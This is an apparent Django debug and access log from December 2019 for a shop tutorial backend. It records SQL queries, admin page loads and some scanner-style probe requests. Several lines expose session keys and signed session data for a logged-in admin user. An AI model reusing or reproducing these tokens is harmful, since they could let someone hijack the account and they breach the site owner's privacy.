"shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-17 05:58:38,278 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) DEBUG 2019-12-17 05:58:38,285 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-17 05:58:38,288 utils 20136 140506667599616 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T05:58:38.286693+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 17, 5, 58, 38, 286693, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-17 05:58:38,311 utils 20136 140506667599616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-31T05:58:38.309434+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 31, 5, 58, 38, 309434, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [17/Dec/2019 05:58:38] "GET /api/v1/fire/ HTTP/1.0" 200 6618 [17/Dec/2019 06:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 06:05:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:16:47] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:21:49] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:22:56] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:26:52] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:33:52] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:43:12] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:48:14] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:53:17] "GET / HTTP/1.0" 302 0 [17/Dec/2019 06:58:20] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:11:00] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:16:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:21:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:22:37] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:28:35] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:33:38] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:38:40] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:43:43] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:48:45] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:53:47] "GET / HTTP/1.0" 302 0 [17/Dec/2019 07:58:50] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:17:33] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:24:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:29:33] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:34:36] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:39:54] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:45:16] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:51:28] "GET / HTTP/1.0" 302 0 [17/Dec/2019 08:57:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:08:28] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:20:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:25:13] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:30:16] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:35:18] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:40:21] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:45:23] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:51:59] "GET / HTTP/1.0" 302 0 [17/Dec/2019 09:57:43] "GET / HTTP/1.0" 302 0 [17/Dec/2019 10:05:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 10:17:35] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [17/Dec/2019 10:22:45] "GET /proxy.php HTTP/1.0" 404 6625 [17/Dec/2019 10:22:49] "GET / HTTP/1.0" 302 0 [17/Dec/2019 10:27:52] "GET / HTTP/1.0" 302 0 [17/Dec/2019 10:33:16] "GET / HTTP/1.0" 302 0 [17/Dec/2019 10:39:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 10:39:32,281 utils 20136 140506667599616 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T10:39:32.270333+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 17, 10, 39, 32, 270333, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-17 10:39:32,284 utils 20136 140506667599616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-17 10:39:32,324 utils 20136 140506667599616 (0.007) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-17 10:39:32,338 utils 20136 140506667599616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-31T10:39:32.335704+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 31, 10, 39, 32, 335704, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [17/Dec/2019 10:39:32] "GET / HTTP/1.0" 200 8878 [17/Dec/2019 10:39:32] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [17/Dec/2019 10:39:32] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [17/Dec/2019 10:39:32] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [17/Dec/2019 10:39:33] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [17/Dec/2019 10:39:33] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [17/Dec/2019 10:39:33] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [17/Dec/2019 10:39:33] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [17/Dec/2019 10:39:33] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [17/Dec/2019 10:39:33] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [17/Dec/2019 10:44:30] "GET / HTTP/1.0" 302 0 [17/Dec/2019 10:51:29] "GET / HTTP/1.0" 302 0 [17/Dec/2019 10:58:09] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:05:45] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:12:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:13:17] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:18:20] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:23:23] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Performing system checks... December 13, 2019 - 14:00:05 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-17 11:24:45,821 utils 4252 140031780505344 (0.012) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-17 11:24:45,829 utils 4252 140031780505344 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-17 11:24:50,953 utils 4252 140031747061504 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T11:24:50.942018+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 17, 11, 24, 50, 942018, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-17 11:24:50,957 utils 4252 140031747061504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-17 11:24:51,049 utils 4252 140031747061504 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-17 11:24:51,060 utils 4252 140031747061504 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-31T11:24:51.058409+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 31, 11, 24, 51, 58409, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [17/Dec/2019 11:24:51] "GET / HTTP/1.0" 200 8208 [17/Dec/2019 11:24:51] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [17/Dec/2019 11:28:25] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:34:01] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:39:17] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:44:41] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 11:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 11:51:18] "GET / HTTP/1.0" 302 0 [17/Dec/2019 11:56:21] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:10:02] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 12:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:13:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 12:13:38,717 utils 4252 140031747061504 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bdpzzfivn7myuyvp64q8b2tqwalgu1vf' LIMIT 1; args=('bdpzzfivn7myuyvp64q8b2tqwalgu1vf',) DEBUG 2019-12-17 12:13:38,721 utils 4252 140031747061504 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bdpzzfivn7myuyvp64q8b2tqwalgu1vf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-31T12:13:38.718270+00:00'::timestamptz); args=('bdpzzfivn7myuyvp64q8b2tqwalgu1vf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 31, 12, 13, 38, 718270, tzinfo=)) [17/Dec/2019 12:13:38] "GET /login/?next=/ HTTP/1.0" 200 1786 [17/Dec/2019 12:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:20:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:25:14] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:30:17] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:38:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 12:39:06,658 utils 4252 140031747061504 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T12:39:06.643164+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 17, 12, 39, 6, 643164, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-17 12:39:06,663 utils 4252 140031747061504 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-17 12:39:06,667 utils 4252 140031747061504 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-17 12:39:06,669 utils 4252 140031747061504 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-17 12:39:06,678 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-17 12:39:06,994 utils 4252 140031747061504 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-31T12:39:06.992669+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 31, 12, 39, 6, 992669, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [17/Dec/2019 12:39:06] "GET /shop/category/ HTTP/1.0" 200 15719 Not Found: /robots.txt [17/Dec/2019 12:40:39] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [17/Dec/2019 12:40:46] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=176 HTTP/1.0" 404 6532 Not Found: /newslist.asp [17/Dec/2019 12:40:52] "GET /newslist.asp?type=4&id=1325 HTTP/1.0" 404 6476 [17/Dec/2019 12:47:00] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:52:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 12:59:19] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:05:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 13:20:10] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:25:31] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:31:04] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:33:32] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:38:35] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:42:01] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:43:38] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:48:40] "GET / HTTP/1.0" 302 0 [17/Dec/2019 13:56:13] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:10:49] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 14:15:52] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:19:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 14:19:55,510 utils 4252 140031747061504 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'd6hvtq1vqtpkggwbkwhjojw83cmoiv59' LIMIT 1; args=('d6hvtq1vqtpkggwbkwhjojw83cmoiv59',) DEBUG 2019-12-17 14:19:55,513 utils 4252 140031747061504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('d6hvtq1vqtpkggwbkwhjojw83cmoiv59', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-31T14:19:55.511406+00:00'::timestamptz); args=('d6hvtq1vqtpkggwbkwhjojw83cmoiv59', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 31, 14, 19, 55, 511406, tzinfo=)) [17/Dec/2019 14:19:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [17/Dec/2019 14:20:55] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 14:26:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:31:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 14:31:36,212 utils 4252 140031747061504 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T14:31:36.203293+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 17, 14, 31, 36, 203293, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-17 14:31:36,214 utils 4252 140031747061504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-17 14:31:36,217 utils 4252 140031747061504 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-17 14:31:36,227 utils 4252 140031747061504 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'product'); args=('shop', 'product') DEBUG 2019-12-17 14:31:36,265 utils 4252 140031747061504 (0.002) DECLARE "_django_curs_140031747061504_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-17 14:31:36,329 utils 4252 140031747061504 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-31T14:31:36.327347+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 31, 14, 31, 36, 327347, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [17/Dec/2019 14:31:36] "GET /shop/product/2/change/ HTTP/1.0" 200 11326 [17/Dec/2019 14:36:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:45:47] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:50:50] "GET / HTTP/1.0" 302 0 [17/Dec/2019 14:55:53] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:14:50] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:19:52] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:24:55] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:29:58] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [17/Dec/2019 15:30:15] "GET /proxy.php HTTP/1.0" 404 6456 [17/Dec/2019 15:35:01] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 15:44:18] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:49:21] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:54:24] "GET / HTTP/1.0" 302 0 [17/Dec/2019 15:59:26] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:05:35] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:10:06] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:20:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:29:17] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:34:20] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:39:22] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:44:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 16:45:26,958 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 